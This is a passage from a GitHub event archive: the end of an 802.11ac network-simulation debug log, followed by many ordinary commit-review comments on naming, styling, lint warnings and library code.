(Contention)Lan80211ac.ap.wlan[0].mac.ctn[0]: Lan80211ac.ap.wlan[0].mac.ctn[0]: FSM fsm: processing event in state OWNING\r\nDEBUG (Contention)Lan80211ac.ap.wlan[0].mac.ctn[0]: Lan80211ac.ap.wlan[0].mac.ctn[0]: FSM fsm: leaving state OWNING\r\nDEBUG (Contention)Lan80211ac.ap.wlan[0].mac.ctn[0]: Lan80211ac.ap.wlan[0].mac.ctn[0]: FSM fsm: condition \"(event == CHANNEL_RELEASED)\" holds, taking transition \"Channel-Released\" to state IDLE\r\nDEBUG (Contention)Lan80211ac.ap.wlan[0].mac.ctn[0]: Lan80211ac.ap.wlan[0].mac.ctn[0]: FSM fsm: done processing associated actions\r\nDEBUG (Contention)Lan80211ac.ap.wlan[0].mac.ctn[0]: Lan80211ac.ap.wlan[0].mac.ctn[0]: FSM fsm: entering state IDLE\r\nDETAIL (MuEnabledDcfUpperMac)Lan80211ac.ap.wlan[0].mac.upperMac: Lan80211ac.ap.wlan[0].mac.upperMac: Frame exchange successful\r\nINFO (MuEnabledDcfUpperMac)Lan80211ac.ap.wlan[0].mac.upperMac: Lan80211ac.ap.wlan[0].mac.upperMac: Frame exchange finished\r\n** Event #122  t=0.008994299027  Lan80211ac.host[0].wlan[0].mac (Ieee80211CompatibleMac, id=50)  on ACK (inet::ieee80211::Ieee80211ACKFrame, id=209)\r\nINFO (Rx)Lan80211ac.host[0].wlan[0].mac.rx: Lan80211ac.host[0].wlan[0].mac.rx: Received frame from PHY: (inet::ieee80211::Ieee80211ACKFrame)ACK\r\nINFO (DcfUpperMac)Lan80211ac.host[0].wlan[0].mac.upperMac: Lan80211ac.host[0].wlan[0].mac.upperMac: This frame is not for us\r\n** Event #123  t=0.009123581522  Lan80211ac.host[1].wlan[0].mac.ctn[0] (Contention, id=98)  on selfmsg startTx (omnetpp::cMessage, id=12)\r\nDETAIL (DcfUpperMac)Lan80211ac.host[1].wlan[0].mac.upperMac: Lan80211ac.host[1].wlan[0].mac.upperMac: Channel access granted\r\nDETAIL (DcfUpperMac)Lan80211ac.host[1].wlan[0].mac.upperMac: Lan80211ac.host[1].wlan[0].mac.upperMac: Doing step 1\r\nDETAIL (DcfUpperMac)Lan80211ac.host[1].wlan[0].mac.upperMac: Lan80211ac.host[1].wlan[0].mac.upperMac: doStep() in step=1 performed transmitFrame()\r\n** Event #129  t=0.009795581522  Lan80211ac.host[1].wlan[0].radio (Ieee80211ScalarRadio, id=90)  on selfmsg transmissionTimer (omnetpp::cMessage, id=14)\r\nDETAIL (DcfUpperMac)Lan80211ac.host[1].wlan[0].mac.upperMac: Lan80211ac.host[1].wlan[0].mac.upperMac: Transmission complete\r\nDETAIL (DcfUpperMac)Lan80211ac.host[1].wlan[0].mac.upperMac: Lan80211ac.host[1].wlan[0].mac.upperMac: Doing step 2\r\nDETAIL (DcfUpperMac)Lan80211ac.host[1].wlan[0].mac.upperMac: Lan80211ac.host[1].wlan[0].mac.upperMac: doStep() in step=2 performed expectReplyStartTxWithin()\r\nDEBUG (Ieee80211CompatibleMac)Lan80211ac.host[1].wlan[0].mac: Lan80211ac.host[1].wlan[0].mac: changing radio to receiver mode\r\n** Event #132  t=0.009795933953  Lan80211ac.ap.wlan[0].mac (Ieee80211acMac, id=109)  on ping0 (inet::ieee80211::Ieee80211DataFrameWithSNAP, id=228)\r\nINFO (Rx)Lan80211ac.ap.wlan[0].mac.rx: Lan80211ac.ap.wlan[0].mac.rx: Received frame from PHY: (inet::ieee80211::Ieee80211DataFrameWithSNAP)ping0\r\n** Event #134  t=0.009795933953  Lan80211ac.ap.wlan[0].mac (Ieee80211acMac, id=109)  on ping0 (inet::ieee80211::Ieee80211DataFrameWithSNAP, id=228)\r\nINFO (MuEnabledDcfUpperMac)Lan80211ac.ap.wlan[0].mac.upperMac: Lan80211ac.ap.wlan[0].mac.upperMac: Frame (inet::ieee80211::Ieee80211DataFrameWithSNAP)ping0 received from higher layer, receiver = 0A-AA-00-00-00-01\r\nDETAIL (MuEnabledDcfUpperMac)Lan80211ac.ap.wlan[0].mac.upperMac: Lan80211ac.ap.wlan[0].mac.upperMac: Starting frame exchange inet::ieee80211::SendDataWithAckFrameExchange\r\nDETAIL (MuEnabledDcfUpperMac)Lan80211ac.ap.wlan[0].mac.upperMac: Lan80211ac.ap.wlan[0].mac.upperMac: Doing step 0\r\nDEBUG (Contention)Lan80211ac.ap.wlan[0].mac.ctn[0]: Lan80211ac.ap.wlan[0].mac.ctn[0]: handleWithFSM: processing event START\r\nDEBUG (Contention)Lan80211ac.ap.wlan[0].mac.ctn[0]: Lan80211ac.ap.wlan[0].mac.ctn[0]: FSM fsm: processing event in state IDLE\r\nDEBUG (Contention)Lan80211ac.ap.wlan[0].mac.ctn[0]: Lan80211ac.ap.wlan[0].mac.ctn[0]: FSM fsm: leaving state IDLE\r\nDEBUG (Contention)Lan80211ac.ap.wlan[0].mac.ctn[0]: Lan80211ac.ap.wlan[0].mac.ctn[0]: FSM fsm: condition \"(event == START && mediumFree)\" holds, taking transition \"Starting-IFS-and-Backoff\" to state IFS_AND_BACKOFF\r\nDEBUG (Contention)Lan80211ac.ap.wlan[0].mac.ctn[0]: Lan80211ac.ap.wlan[0].mac.ctn[0]: FSM fsm: done processing associated actions\r\nDEBUG (Contention)Lan80211ac.ap.wlan[0].mac.ctn[0]: Lan80211ac.ap.wlan[0].mac.ctn[0]: FSM fsm: entering state IFS_AND_BACKOFF\r\nDETAIL (MuEnabledDcfUpperMac)Lan80211ac.ap.wlan[0].mac.upperMac: Lan80211ac.ap.wlan[0].mac.upperMac: doStep() in step=0 performed startContention()\r\n** Event #136  t=0.00979629898  Lan80211ac.host[0].wlan[0].mac (Ieee80211CompatibleMac, id=50)  on ping0 (inet::ieee80211::Ieee80211DataFrameWithSNAP, id=234)\r\nINFO (Rx)Lan80211ac.host[0].wlan[0].mac.rx: Lan80211ac.host[0].wlan[0].mac.rx: Received frame from PHY: (inet::ieee80211::Ieee80211DataFrameWithSNAP)ping0\r\nINFO (Rx)Lan80211ac.host[0].wlan[0].mac.rx: Lan80211ac.host[0].wlan[0].mac.rx: Setting NAV to 0.000314\r\nDEBUG (Contention)Lan80211ac.host[0].wlan[0].mac.ctn[0]: Lan80211ac.host[0].wlan[0].mac.ctn[0]: handleWithFSM: processing event MEDIUM_STATE_CHANGED\r\nDEBUG (Contention)Lan80211ac.host[0].wlan[0].mac.ctn[0]: Lan80211ac.host[0].wlan[0].mac.ctn[0]: FSM fsm: processing event in state IDLE\r\nDEBUG (Contention)Lan80211ac.host[0].wlan[0].mac.ctn[0]: Lan80211ac.host[0].wlan[0].mac.ctn[0]: FSM fsm: condition \"event==MEDIUM_STATE_CHANGED\" holds, staying in current state\r\nINFO (DcfUpperMac)Lan80211ac.host[0].wlan[0].mac.upperMac: Lan80211ac.host[0].wlan[0].mac.upperMac: This frame is not for us\r\n** Event #143  t=0.010017581522  Lan80211ac.host[1].wlan[0].mac.upperMac (DcfUpperMac, id=96)  on selfmsg timeout (omnetpp::cMessage, id=224)\r\nDETAIL (DcfUpperMac)Lan80211ac.host[1].wlan[0].mac.upperMac: Timeout in step 2\r\n** Event #146  t=0.010109933953  Lan80211ac.ap.wlan[0].radio (Ieee80211ScalarRadio, id=110)  on selfmsg transmissionTimer (omnetpp::cMessage, id=18)\r\nDEBUG (Ieee80211acMac)Lan80211ac.ap.wlan[0].mac: Lan80211ac.ap.wlan[0].mac: changing radio to receiver mode\r\n** Event #149  t=0.010110286339  Lan80211ac.host[1].wlan[0].mac (Ieee80211CompatibleMac, id=89)  on ACK (inet::ieee80211::Ieee80211ACKFrame, id=251)\r\nINFO (Rx)Lan80211ac.host[1].wlan[0].mac.rx: Lan80211ac.host[1].wlan[0].mac.rx: Received frame from PHY: (inet::ieee80211::Ieee80211ACKFrame)ACK\r\nDETAIL (DcfUpperMac)Lan80211ac.host[1].wlan[0].mac.upperMac: Lan80211ac.host[1].wlan[0].mac.upperMac: Lower frame received in step 2\r\nDETAIL (DcfUpperMac)Lan80211ac.host[1].wlan[0].mac.upperMac: Lan80211ac.host[1].wlan[0].mac.upperMac: processReply(): frame PROCESSED in step=2 performed no-op\r\nDETAIL (DcfUpperMac)Lan80211ac.host[1].wlan[0].mac.upperMac: Lan80211ac.host[1].wlan[0].mac.upperMac: Doing step 3\r\nDEBUG (Contention)Lan80211ac.host[1].wlan[0].mac.ctn[0]: Lan80211ac.host[1].wlan[0].mac.ctn[0]: handleWithFSM: processing event CHANNEL_RELEASED\r\nDEBUG (Contention)Lan80211ac.host[1].wlan[0].mac.ctn[0]: Lan80211ac.host[1].wlan[0].mac.ctn[0]: FSM fsm: processing event in state OWNING\r\nDEBUG (Contention)Lan80211ac.host[1].wlan[0].mac.ctn[0]: Lan80211ac.host[1].wlan[0].mac.ctn[0]: FSM fsm: leaving state OWNING\r\nDEBUG (Contention)Lan80211ac.host[1].wlan[0].mac.ctn[0]: Lan80211ac.host[1].wlan[0].mac.ctn[0]: FSM fsm: condition \"(event == CHANNEL_RELEASED)\" holds, taking transition \"Channel-Released\" to state IDLE\r\nDEBUG (Contention)Lan80211ac.host[1].wlan[0].mac.ctn[0]: Lan80211ac.host[1].wlan[0].mac.ctn[0]: FSM fsm: done processing associated actions\r\nDEBUG (Contention)Lan80211ac.host[1].wlan[0].mac.ctn[0]: Lan80211ac.host[1].wlan[0].mac.ctn[0]: FSM fsm: entering state IDLE\r\nDETAIL (DcfUpperMac)Lan80211ac.host[1].wlan[0].mac.upperMac: Lan80211ac.host[1].wlan[0].mac.upperMac: Frame exchange successful\r\nINFO (DcfUpperMac)Lan80211ac.host[1].wlan[0].mac.upperMac: Lan80211ac.host[1].wlan[0].mac.upperMac: Frame exchange finished\r\n** Event #152  t=0.01011055355  Lan80211ac.host[0].wlan[0].mac (Ieee80211CompatibleMac, id=50)  on ACK (inet::ieee80211::Ieee80211ACKFrame, id=254)\r\nINFO (Rx)Lan80211ac.host[0].wlan[0].mac.rx: Lan80211ac.host[0].wlan[0].mac.rx: Received frame from PHY: (inet::ieee80211::Ieee80211ACKFrame)ACK\r\nINFO (DcfUpperMac)Lan80211ac.host[0].wlan[0].mac.upperMac: Lan80211ac.host[0].wlan[0].mac.upperMac: This frame is not for us\r\n** Event #153  t=0.010359933953  Lan80211ac.ap.wlan[0].mac.ctrl (CollisionController, id=123)  on selfmsg txStart-0 (omnetpp::cMessage, id=63)\r\nDETAIL (MuEnabledDcfUpperMac)Lan80211ac.ap.wlan[0].mac.upperMac: Lan80211ac.ap.wlan[0].mac.upperMac: Channel access granted\r\nDETAIL (MuEnabledDcfUpperMac)Lan80211ac.ap.wlan[0].mac.upperMac: Lan80211ac.ap.wlan[0].mac.upperMac: Doing step 1\r\nDETAIL (MuEnabledDcfUpperMac)Lan80211ac.ap.wlan[0].mac.upperMac: Lan80211ac.ap.wl\r\n```"}},"created_at":"2016-09-02T13:20:53Z"}
{"id":"4508465521","type":"CommitCommentEvent","actor":{"login":"rpherbig"},"repo":{"name":"rpherbig/dr-scripts"},"payload":{"comment":{"id":18880122,"position":5,"line":12,"path":"appraisal.lic","commit_id":"8df1a6b1ccb5551de8b60251199326adec093133","created_at":"2016-09-02T13:21:04Z","updated_at":"2016-09-02T13:21:04Z","body":"I'd like to see these named 'data' instead of 'settings' now, to help make the difference clear."}},"created_at":"2016-09-02T13:21:04Z"}
{"id":"4508465632","type":"CommitCommentEvent","actor":{"login":"otakai"},"repo":{"name":"otakai/projeto-usp.github.io"},"payload":{"comment":{"id":18880123,"position":null,"line":null,"path":null,"commit_id":"ad73a1595f671f96d845be7981b401b44dbb10b8","created_at":"2016-09-02T13:21:06Z","updated_at":"2016-09-02T13:21:06Z","body":"remover"}},"created_at":"2016-09-02T13:21:06Z"}
{"id":"4508466852","type":"CommitCommentEvent","actor":{"login":"otakai"},"repo":{"name":"otakai/projeto-usp.github.io"},"payload":{"comment":{"id":18880127,"position":null,"line":null,"path":null,"commit_id":"ad73a1595f671f96d845be7981b401b44dbb10b8","created_at":"2016-09-02T13:21:20Z","updated_at":"2016-09-02T13:21:20Z","body":"remover\r\n"}},"created_at":"2016-09-02T13:21:20Z"}
{"id":"4508467487","type":"CommitCommentEvent","actor":{"login":"kaueb"},"repo":{"name":"ThallysonB/NewFitnessNatal"},"payload":{"comment":{"id":18880128,"position":null,"line":null,"path":null,"commit_id":"e5c7be6c240cc262c6e19fff4be32042a2f70d4e","created_at":"2016-09-02T13:21:28Z","updated_at":"2016-09-02T13:21:28Z","body":"Usa esse site para favicons: http://realfavicongenerator.net/"}},"created_at":"2016-09-02T13:21:28Z"}
{"id":"4508469134","type":"CommitCommentEvent","actor":{"login":"Jawshy"},"repo":{"name":"DardoTheMaster/Framework"},"payload":{"comment":{"id":18880135,"position":6,"line":23,"path":"Altis_Life.Altis/core/actions/fn_impoundAction.sqf","commit_id":"6b1d5ac8048a94e443986223524264f6c95b325f","created_at":"2016-09-02T13:21:49Z","updated_at":"2016-09-02T13:21:49Z","body":"Could replace the [`==`](https://community.bistudio.com/wiki/a%20==%20b) with [`isEqualTo`](https://community.bistudio.com/wiki/isEqualTo). \r\n"}},"created_at":"2016-09-02T13:21:49Z"}
{"id":"4508471605","type":"CommitCommentEvent","actor":{"login":"rcuhljr"},"repo":{"name":"rpherbig/dr-scripts"},"payload":{"comment":{"id":18880140,"position":4,"line":822,"path":"combat-trainer.lic","commit_id":"8df1a6b1ccb5551de8b60251199326adec093133","created_at":"2016-09-02T13:22:20Z","updated_at":"2016-09-02T13:22:20Z","body":"Bad merge apparently, we had a conflict there and I selected used the remote without looking at it."}},"created_at":"2016-09-02T13:22:20Z"}
{"id":"4508471655","type":"CommitCommentEvent","actor":{"login":"otakai"},"repo":{"name":"otakai/projeto-usp.github.io"},"payload":{"comment":{"id":18880141,"position":null,"line":null,"path":null,"commit_id":"ad73a1595f671f96d845be7981b401b44dbb10b8","created_at":"2016-09-02T13:22:21Z","updated_at":"2016-09-02T13:22:21Z","body":"remover"}},"created_at":"2016-09-02T13:22:21Z"}
{"id":"4508473414","type":"CommitCommentEvent","actor":{"login":"rcuhljr"},"repo":{"name":"rpherbig/dr-scripts"},"payload":{"comment":{"id":18880149,"position":5,"line":12,"path":"appraisal.lic","commit_id":"8df1a6b1ccb5551de8b60251199326adec093133","created_at":"2016-09-02T13:22:42Z","updated_at":"2016-09-02T13:22:42Z","body":"Warm up your ctrl+h keys then."}},"created_at":"2016-09-02T13:22:42Z"}
{"id":"4508476750","type":"CommitCommentEvent","actor":{"login":"cicku"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":18880154,"position":null,"line":null,"path":null,"commit_id":"b01699cf09ce1d4f0f8c0c529efaf08759c42684","created_at":"2016-09-02T13:23:22Z","updated_at":"2016-09-02T13:23:22Z","body":"#330 #334"}},"created_at":"2016-09-02T13:23:22Z"}
{"id":"4508478088","type":"CommitCommentEvent","actor":{"login":"kaueb"},"repo":{"name":"ThallysonB/NewFitnessNatal"},"payload":{"comment":{"id":18880161,"position":7,"line":215,"path":"scss/style.scss","commit_id":"01e119b16ee04e3fa0c776215aab57877efebc66","created_at":"2016-09-02T13:23:38Z","updated_at":"2016-09-02T13:23:38Z","body":"Por padrão, dá um `enter` entre uma propriedade e uma classe. Por exemplo:\r\n\r\n```\r\n.customNavigation{\r\n  margin-top: 1.5em;\r\n  text-align: center;\r\n\r\n .btn-slide { ... }```"}},"created_at":"2016-09-02T13:23:38Z"}
{"id":"4508479215","type":"CommitCommentEvent","actor":{"login":"aafemt"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":18880165,"position":14,"line":892,"path":"src/common/common.h","commit_id":"3533997873869a44932bb0c3f8ce42c0cc5043f3","created_at":"2016-09-02T13:23:53Z","updated_at":"2016-09-02T13:23:53Z","body":"Even if we keep that support, it is much better to define \"final\" to an empty string for old compilers than pollute code with FB_FINAL which isn't handled by MSVC intellisense well."}},"created_at":"2016-09-02T13:23:53Z"}
{"id":"4508481661","type":"CommitCommentEvent","actor":{"login":"kaueb"},"repo":{"name":"ThallysonB/NewFitnessNatal"},"payload":{"comment":{"id":18880171,"position":18,"line":226,"path":"scss/style.scss","commit_id":"01e119b16ee04e3fa0c776215aab57877efebc66","created_at":"2016-09-02T13:24:23Z","updated_at":"2016-09-02T13:24:23Z","body":"Mesma coisa do comentário acima, um espaço entre as propriedades da classe e qualquer seletor ou pseudo eletor que você for utilizar."}},"created_at":"2016-09-02T13:24:23Z"}
{"id":"4508484138","type":"CommitCommentEvent","actor":{"login":"yoshuawuyts"},"repo":{"name":"theatlasroom/tidbits"},"payload":{"comment":{"id":18880178,"position":null,"line":null,"path":null,"commit_id":"698766c17c25d18a185495f0de471a9350aedb65","created_at":"2016-09-02T13:24:52Z","updated_at":"2016-09-02T13:24:52Z","body":"yay! - feel free to PR to `knowledge` and link this - it's super cool :D"}},"created_at":"2016-09-02T13:24:52Z"}
{"id":"4508486033","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18880180,"position":null,"line":null,"path":null,"commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-02T13:25:15Z","updated_at":"2016-09-02T13:25:15Z","body":"Nice to have: \r\n - use HQL instead of SQL when performing queries into the Java classes (best, use JOOQ);\r\n - Use some properties files and locale to avoid having the text into the JSP only in one language;\r\n - use a REST architecture instead of servlets (no HTML into the Java classes, less classes/code to do the same, easiest to handle in the frontend...)\r\n - Use a inmemory database for tests as H2, this way no data is persisted into the database when launching the tests (or use another database in the same server (with a \"test\" prefix))\r\n - use camel case when naming the fields into the Hibernate classes and avoid upper cases when naming the columns"}},"created_at":"2016-09-02T13:25:15Z"}
{"id":"4508487044","type":"CommitCommentEvent","actor":{"login":"rpherbig"},"repo":{"name":"rpherbig/dr-scripts"},"payload":{"comment":{"id":18880182,"position":89,"line":737,"path":"dependency.lic","commit_id":"8df1a6b1ccb5551de8b60251199326adec093133","created_at":"2016-09-02T13:25:26Z","updated_at":"2016-09-02T13:25:26Z","body":"Can this be called from `common*` files?"}},"created_at":"2016-09-02T13:25:26Z"}
{"id":"4508491790","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18880210,"position":9,"line":null,"path":"tests/OrmTest.php","commit_id":"175369f2560b3c50480e67b1cae280580ac2d11c","created_at":"2016-09-02T13:26:23Z","updated_at":"2016-09-02T13:26:23Z","body":"PHPCS: Method name \"OrmTest::test_find\" is not in camel caps format"}},"created_at":"2016-09-02T13:26:23Z"}
{"id":"4508491836","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18880211,"position":19,"line":null,"path":"src/Orm.php","commit_id":"175369f2560b3c50480e67b1cae280580ac2d11c","created_at":"2016-09-02T13:26:24Z","updated_at":"2016-09-02T13:26:24Z","body":"PHPCS: Opening parenthesis of a multi-line function call must be the last content on the line"}},"created_at":"2016-09-02T13:26:24Z"}
{"id":"4508492866","type":"CommitCommentEvent","actor":{"login":"rcuhljr"},"repo":{"name":"rpherbig/dr-scripts"},"payload":{"comment":{"id":18880213,"position":89,"line":737,"path":"dependency.lic","commit_id":"8df1a6b1ccb5551de8b60251199326adec093133","created_at":"2016-09-02T13:26:36Z","updated_at":"2016-09-02T13:26:36Z","body":"That was the reason to make it."}},"created_at":"2016-09-02T13:26:36Z"}
{"id":"4508493348","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18880216,"position":7,"line":null,"path":"tests/OrmTest.php","commit_id":"175369f2560b3c50480e67b1cae280580ac2d11c","created_at":"2016-09-02T13:26:42Z","updated_at":"2016-09-02T13:26:42Z","body":"Class OrmTest is missing a docblock."}},"created_at":"2016-09-02T13:26:42Z"}
{"id":"4508493397","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18880217,"position":9,"line":null,"path":"tests/OrmTest.php","commit_id":"175369f2560b3c50480e67b1cae280580ac2d11c","created_at":"2016-09-02T13:26:43Z","updated_at":"2016-09-02T13:26:43Z","body":"OrmTest::test_find is missing a docblock."}},"created_at":"2016-09-02T13:26:43Z"}
{"id":"4508493445","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18880218,"position":5,"line":null,"path":"src/Orm.php","commit_id":"175369f2560b3c50480e67b1cae280580ac2d11c","created_at":"2016-09-02T13:26:44Z","updated_at":"2016-09-02T13:26:44Z","body":"Class Orm is missing a docblock."}},"created_at":"2016-09-02T13:26:44Z"}
{"id":"4508493486","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18880219,"position":11,"line":null,"path":"src/Orm.php","commit_id":"175369f2560b3c50480e67b1cae280580ac2d11c","created_at":"2016-09-02T13:26:44Z","updated_at":"2016-09-02T13:26:44Z","body":"Orm::__construct is missing a docblock."}},"created_at":"2016-09-02T13:26:44Z"}
{"id":"4508493522","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18880220,"position":17,"line":null,"path":"src/Orm.php","commit_id":"175369f2560b3c50480e67b1cae280580ac2d11c","created_at":"2016-09-02T13:26:45Z","updated_at":"2016-09-02T13:26:45Z","body":"Orm::find is missing a docblock."}},"created_at":"2016-09-02T13:26:45Z"}
{"id":"4508493907","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18880221,"position":20,"line":null,"path":"src/Orm.php","commit_id":"175369f2560b3c50480e67b1cae280580ac2d11c","created_at":"2016-09-02T13:26:49Z","updated_at":"2016-09-02T13:26:49Z","body":"\n      Avoid unused local variables such as '$ind'.\n    "}},"created_at":"2016-09-02T13:26:49Z"}
{"id":"4508494192","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18880222,"position":null,"line":null,"path":null,"commit_id":"f7cd38757bbb55acc9755eeb4009840aab39e685","created_at":"2016-09-02T13:26:53Z","updated_at":"2016-09-02T13:26:53Z","body":"Please, avoid scriplet!!!!"}},"created_at":"2016-09-02T13:26:53Z"}
{"id":"4508494659","type":"CommitCommentEvent","actor":{"login":"kaueb"},"repo":{"name":"ThallysonB/NewFitnessNatal"},"payload":{"comment":{"id":18880226,"position":10,"line":218,"path":"scss/style.scss","commit_id":"01e119b16ee04e3fa0c776215aab57877efebc66","created_at":"2016-09-02T13:26:59Z","updated_at":"2016-09-02T13:26:59Z","body":"Isso não é uma correção, é mais algo para você pensar sobre:\r\n\r\nEu acho meio complicado usar `em/rem` em medidas de margin e padding, você não acha?\r\nPrefiro deixar isso só para fontes.\r\nVocê fica de boa em usar em margins e paddings?"}},"created_at":"2016-09-02T13:26:59Z"}
{"id":"4508496304","type":"CommitCommentEvent","actor":{"login":"marcelfarres"},"repo":{"name":"pylls/datatrack"},"payload":{"comment":{"id":18880231,"position":66,"line":87,"path":"remote/google/model.go","commit_id":"9634abcbc2f24328ee1470e16c6f4113880865d5","created_at":"2016-09-02T13:27:20Z","updated_at":"2016-09-02T13:27:20Z","body":"Ups ... my bad."}},"created_at":"2016-09-02T13:27:20Z"}
{"id":"4508498012","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"mstembera/Stockfish"},"payload":{"comment":{"id":18880235,"position":null,"line":null,"path":null,"commit_id":"6e5c07abdd9aa423393e706ff9d8298f4fe42cb8","created_at":"2016-09-02T13:27:40Z","updated_at":"2016-09-02T13:27:40Z","body":"Here you have it:\r\nhttps://github.com/mstembera/Stockfish/compare/kqPawnImbalance...lucabrivio:pawns_initiative\r\nSpeedup is about 1% in default bench over this patch (I expect more in real play and analysis as the pawns table hit ratio will of course increase from search to search)."}},"created_at":"2016-09-02T13:27:40Z"}
{"id":"4508505377","type":"CommitCommentEvent","actor":{"login":"marcelfarres"},"repo":{"name":"pylls/datatrack"},"payload":{"comment":{"id":18880246,"position":7,"line":53,"path":"database/downstream.go","commit_id":"9634abcbc2f24328ee1470e16c6f4113880865d5","created_at":"2016-09-02T13:29:09Z","updated_at":"2016-09-02T13:29:09Z","body":"`return appendValueInList(d.Origin, d.Result, result)`\r\nis equivalent to \r\n```\r\nerr = appendValueInList(d.Origin, d.Result, result)\r\nreturn err \r\n```\r\nand \r\n```\r\nif err = appendValueInList(d.Origin, d.Result, result); err != nil {\r\n\treturn err\r\n}\r\n```"}},"created_at":"2016-09-02T13:29:09Z"}
{"id":"4508507043","type":"CommitCommentEvent","actor":{"login":"mogoodrich"},"repo":{"name":"openmrs/openmrs-module-htmlformentry"},"payload":{"comment":{"id":18880247,"position":null,"line":null,"path":null,"commit_id":"25149f5094de966006c3a31ec7712b8fadb66bfe","created_at":"2016-09-02T13:29:29Z","updated_at":"2016-09-02T13:29:29Z","body":"Yep, sounds good, thanks @dkayiwa!"}},"created_at":"2016-09-02T13:29:29Z"}
{"id":"4508508633","type":"CommitCommentEvent","actor":{"login":"Catzenjaeger"},"repo":{"name":"Catzenjaeger/FigureLib_4"},"payload":{"comment":{"id":18880252,"position":null,"line":null,"path":null,"commit_id":"190fbd139518ca25a00da65c70a45cf33e1c9cd6","created_at":"2016-09-02T13:29:48Z","updated_at":"2016-09-02T13:29:48Z","body":"OMG you are my hero today its worksssssssssss :) "}},"created_at":"2016-09-02T13:29:48Z"}
{"id":"4508509559","type":"CommitCommentEvent","actor":{"login":"kaueb"},"repo":{"name":"ThallysonB/NewFitnessNatal"},"payload":{"comment":{"id":18880256,"position":14,"line":222,"path":"scss/style.scss","commit_id":"01e119b16ee04e3fa0c776215aab57877efebc66","created_at":"2016-09-02T13:30:00Z","updated_at":"2016-09-02T13:30:00Z","body":"Propriedades como `transition` nem sempre são suportadas nativamente por todos os browser.\r\nEu não sei como que você faz pra compilar o seu SCSS em CSS, mas o ideal é que você utilizar algo com `auto prefixer`, depois pesquisa sobre isso.\r\n\r\nClaro, se isso for só um exercício não é tão necessário. Mas se for algo que vai pro ar mesmo, aí é bom usar."}},"created_at":"2016-09-02T13:30:00Z"}
{"id":"4508510866","type":"CommitCommentEvent","actor":{"login":"ccharly"},"repo":{"name":"NumScale/boost.simd"},"payload":{"comment":{"id":18880261,"position":7,"line":14,"path":"README.md","commit_id":"8a483ff21ed8523d2783fef50f448d58af5b068f","created_at":"2016-09-02T13:30:17Z","updated_at":"2016-09-02T13:30:17Z","body":"the -> The"}},"created_at":"2016-09-02T13:30:17Z"}
{"id":"4508514412","type":"CommitCommentEvent","actor":{"login":"mmatuska"},"repo":{"name":"mmatuska/libarchive"},"payload":{"comment":{"id":18880266,"position":3,"line":421,"path":"libarchive/archive_read_disk_entry_from_file.c","commit_id":"0fb4708dcc87db7f8990a021b81aa1f0d6d32e20","created_at":"2016-09-02T13:30:59Z","updated_at":"2016-09-02T13:30:59Z","body":"If we don't have a fd and we are inside a subdirectory we need to set `a->tree_enter_working_dir()` otherwise `acl_get_file()` will always lookup a file in the top level directory, which remains current. This code is analogous to the code in `setup_xattrs()`."}},"created_at":"2016-09-02T13:30:59Z"}
{"id":"4508515095","type":"CommitCommentEvent","actor":{"login":"sebbekarlsson"},"repo":{"name":"jquery/jquery"},"payload":{"comment":{"id":18880268,"position":76,"line":203,"path":"src/core.js","commit_id":"f519539d3b7a12b67adc3b2c63a19e3beca33a83","created_at":"2016-09-02T13:31:06Z","updated_at":"2016-09-02T13:31:06Z","body":"Why?"}},"created_at":"2016-09-02T13:31:06Z"}
{"id":"4508515425","type":"CommitCommentEvent","actor":{"login":"mmatuska"},"repo":{"name":"mmatuska/libarchive"},"payload":{"comment":{"id":18880270,"position":26,"line":443,"path":"libarchive/archive_read_disk_entry_from_file.c","commit_id":"0fb4708dcc87db7f8990a021b81aa1f0d6d32e20","created_at":"2016-09-02T13:31:11Z","updated_at":"2016-09-02T13:31:11Z","body":"`acl_get_fd()` always gets only POSIX.1e ACLs on FreeBSD. We need `acl_get_fd_np()` here."}},"created_at":"2016-09-02T13:31:11Z"}
{"id":"4508517506","type":"CommitCommentEvent","actor":{"login":"mmatuska"},"repo":{"name":"mmatuska/libarchive"},"payload":{"comment":{"id":18880277,"position":41,"line":458,"path":"libarchive/archive_read_disk_entry_from_file.c","commit_id":"0fb4708dcc87db7f8990a021b81aa1f0d6d32e20","created_at":"2016-09-02T13:31:34Z","updated_at":"2016-09-02T13:31:34Z","body":"We definitely do not want to check if a NULL ACL is trivial."}},"created_at":"2016-09-02T13:31:34Z"}
{"id":"4508518341","type":"CommitCommentEvent","actor":{"login":"gajus"},"repo":{"name":"glenjamin/ultimate-hot-reloading-example"},"payload":{"comment":{"id":18880280,"position":5,"line":43,"path":"server.js","commit_id":"d57bc1e1265aa366687e8cb10d572b74b161bb37","created_at":"2016-09-02T13:31:44Z","updated_at":"2016-09-02T13:31:44Z","body":"This condition is a bit loose. You could do:\r\n\r\n```js\r\nconst serverPath = path.resolve(__dirname, './server');\r\n// [..]\r\nif (id.includes(serverPath)) delete require.cache[id];\r\n```\r\n\r\n"}},"created_at":"2016-09-02T13:31:44Z"}
